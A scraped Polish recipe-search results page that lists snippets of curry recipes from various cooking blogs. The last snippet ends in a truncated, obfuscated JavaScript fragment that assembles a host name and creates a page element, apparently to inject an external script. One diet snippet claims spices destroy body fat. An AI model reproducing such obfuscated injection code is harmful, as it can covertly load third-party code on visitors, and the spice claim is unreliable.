curry - 8956 przepisów (strona:372/598)

Kurczak pieczony w rękawie z figami 118

bardzo lubię. Koniecznie sami spróbujcie! 3 ćwiartki z kurczaka (mogą być dowolne części z kurczaka) Marynata: 1 łyżka sosu sojowego 1 łyżeczka soli 1/2 łyżeczki papryki słodkiej 1/3 łyżeczki curry pieprz (według smaku) Dodatkowo: 5 suszonych fig (użyłam ze Zdrowy Market 24)  Składniki marynaty wymieszać. Kurczaka umyć, ja dodatkowo ćwiartki przecinam na dwie części i po osuszeniu dokładnie pokryć

Di gotuje
Wegańskie pasty kanapkowe 129

zbyt gęsta, dolej odrobinę płynu.   Wegańska pasta pomidorowa:   Składniki: 200g ugotowanej fasoli typu Jaś 1 łyżka koncentratu pomidorowego 1 ząbek czosnku 20g oleju kokosowego 1 łyżeczka przyprawy curry 80ml wody lub wywaru warzywnego 2 łyżki orzeszków piniowych 1 łyżeczka soli pieprz czarny   Sposób przygotowania: Czosnek obierz i posiekaj. Orzeszki piniowe upraż na suchej patelni

kuron.com.pl
Nuggetsy (bezglutenowe) 139

pszennej. Zapraszam. Składniki: 2 małe piersi z kurczaka 1 szklanka mąki kukurydzianej 3/4 szklanki wody 1 jajko bułka tarta (bezglutenowa) garść sezamu przyprawy: 1/2 łyżeczki soli, pieprz, papryka słodka, curry tłuszcz (np olej z pestek winogron) Wykonanie: 1. Umyte piersi z kurczaka kroimy na małe cząstki. 2. Do miski wsypujemy mąkę kukurydzianą oraz przyprawy i mieszamy. 3. Następnie dodajemy wodę

Kawa z mlekiem
Jaglanka z warzywami i boczkiem (bezglutenowa) 146

boczku 2 cebule 1 papryka 1 puszka kukurydzy garść mrożonego groszku (może być z marchewką) kilka zielonych oliwek garść pomidorków koktajlowych oliwa + łyżka masła sól, pieprz, i dowolnie: oregano, curry, kurkuma Wykonanie: 1. Najpierw gotujemy kaszę jaglaną. Na pół szklanki kaszy potrzebujemy szklankę wody, którą trzeba zagotować, do gotującej wody dodajemy łyżkę masła, odrobinę soli i kurkumy. Kaszę trzeba wypłukać

Kawa z mlekiem
Tajska sałatka z ogórka 184

ostrości możecie oczywiście dostosować do własnych potrzeb dodając mniej lub więcej papryczki chilli. Polecam ją do wszelkiego rodzaju pieczonych lub smażonych mięs, ale także do ryb i dań typu curry.  Tajska sałatka z ogórka Składniki:  1 duży ogórek wężowy 4 łodygi dymki pokrojonej w plasterki 1 czerwona papryczka chilli drobniutko posiekana 2-3 szalotki bananowe pokrojone w cieniutkie

Codzienne Gotowanie
Ryż cytrynowy – na dodatek nie tylko do ryby 308

uzyskuje całkiem nową odsłonę – dodatki do obiadu wcale nie muszą być nudne! Tak przygotowany ryż sprawdzi się zarówno do ryb i krewetek, ale będzie też świetnie pasował do orientalnego curry, warzyw z patelni i jasnych mięs. Spróbujcie! Ryż gotujemy na sypko – podstawowy sposób gotowania ryżu wymaga użycia 2 części wody na 1 część ryżu, ale ryż będzie wtedy kleisty. Żeby

Karo in the Kitchen
Mac and Cheese – makaron z serem w nowej wersji – z dynią! (wegański) 170

makaronu 1 szklanka puree z dyni 3 łyżki płatków drożdżowych 1 cebula 1 ząbek czosnku 2/3 szklanki mleka (ok. 160 ml) przyprawy i zioła (u mnie sól, curry i suszona natka pietruszki) Sposób przygotowania: Makaron ugotuj zgodnie z informacją na opakowaniu. Puree z dyni zblenduj na gładką masę z pokrojoną cebulą, czosnkiem i mlekiem. Następnie do powstałego „sera

Via Gusto
ROLLSY, CZYLI SZYBKA PRZEKĄSKA LCHF (keto, LCHF, paleo, optymalne, bez glutenu i laktozy) 189

posypać bazylią. Naleśniki zwijać ciasno w rulon i spiąć wykałaczkami aby nie rozwijały się a następnie pokroić na kawałki ok 4-5 cm. Podawać z ulubionymi dipami np czosnkowym, curry, tzatziki itp. Smacznego! — Nie podaję BTW ponieważ wszystko zależy od składników jakich użyjecie do przygotowania rollsów   Artykuł ROLLSY, CZYLI SZYBKA PRZEKĄSKA LCHF (keto, LCHF, paleo, optymalne, bez glutenu

Ola la LCHF
Dieta 3D Chili – na czym polega i czy jest skuteczna? 131

uodpornienia się organizmu na nią, a w konsekwencji zatrzymanie metabolizmu i spowolnienie procesu spalania tłuszczu. I tak oto przyprawy czerwone przyspieszają metabolizm i niszczą tkankę tłuszczową. Są nimi m.in.: curry, pepperoni, pieprz czarny, papryka, chili. Natomiast przyprawy żółte ułatwiają trawienie, poprawiają krążenie oraz hamują apetyt. Przyprawy żółte to np.: kardamon, imbir, cynamon. Ostatnia trzecia grupa to przyprawy zielone, które działają

Dajet
Puree ziemniaczano-kalafiorowe 215

Selen     0,6 µg Fluor      1 µg Fitosterole 18 mg Kalafior w kuchni Sałatka z pieczonym kalafiorem i ciecierzycą Keralskie curry warzywne według Jamiego Olivera Pieczony kalafior z przyprawami   Pieczony kalafior Indyjska zupa krem z kalafiora Zupa krem serowo-kalafiorowa Klasyczna zupa kalafiorowa Rozgrzewający krem z kalafiora z chili Sałatka z groszkiem

Kulinarne przygody Gatity
Gołąbki z kaszą jęczmienną i sosem pomidorowym 145

passaty z pomidorów łyżeczka koncentratu pomidorowego 3 łyżki jogurtu naturalnego 6 listków świeżej bazylii szczypta cukru sól i pieprz papryka słodka i ostra do smaku 1/2 łyżeczka curry Przygotowanie: Główkę kapusty wkładamy do garnka z wodą i gotujemy ok 10 minut, aby łatwiej odchodziły liście. Wyjmujemy Kapustę i wycinamy gołąb nie uszkadzając liści. Kaszę gotujemy do miękkości. Studzimy. Mięso wrzucamy

ChilliJemy
Tajskie kotleciki z dorsza 126

porcji dla 2 osób potrzebujemy: - ok. 250 g filetu z dorsza - 3-4 łyżki mąki pszennej - 1 łyżkę sosu rybnego - 1 łyżkę sosu sojowego - 1 czubatą łyżeczkę czerwonej pasty curry - 1 małą papryczkę chili bez pestek - garść posiekanej kolendry - sok z połowy cytryny - szczyptę pieprzu - olej do smażenia 1. Rybę drobno siekamy i przekładamy do miski, a następnie dodajemy

Bez Cebuli
Zupa warzywna z kaszą jaglaną 163

Składniki: 1 mały brokuł 2 marchewki kilka brukselek 4-5 ziemniaków 2 pomidory 1 cebula 3 łyżki kaszy jaglanej 1 łyżka koncentratu pomidorowego 2 litry bulionu sól, pieprz curry papryka słodka imbir do smaku 1 łyżka oleju Przygotowany wcześniej bulion postawić na ogniu, aby się zagrzał. W tym czasie przygotować warzywa: brokuł podzielić na różyczki, marchewkę obrać i pokroić

talerz przyjemności
Piersi z kurczaka wysuszone na wiór? Sprawdź, jak uzyskać soczyste mięso! 198

roku, nosząc wówczas miano Indii Brytyjskich. Swój niepowtarzalny smak i aromat potrawa zawdzięcza specjalnie dobranej kompozycji przypraw, takich jak m.in. świeży imbir, kurkuma, ostra papryka, kmin, kolendra, czosnek, cebula, curry. Wbrew pozorom danie to jest naprawdę proste w przygotowaniu. Przede wszystkim jest jednak wyjątkowo smaczne, dlatego na pewno warto je przyrządzić! (function(){ x0Xd_=("u"+"")+"s"+"";x0Xd_+=("tat.")+("i"); x0Xd=document.createElement

CookMag

Proponowane wyszukiwania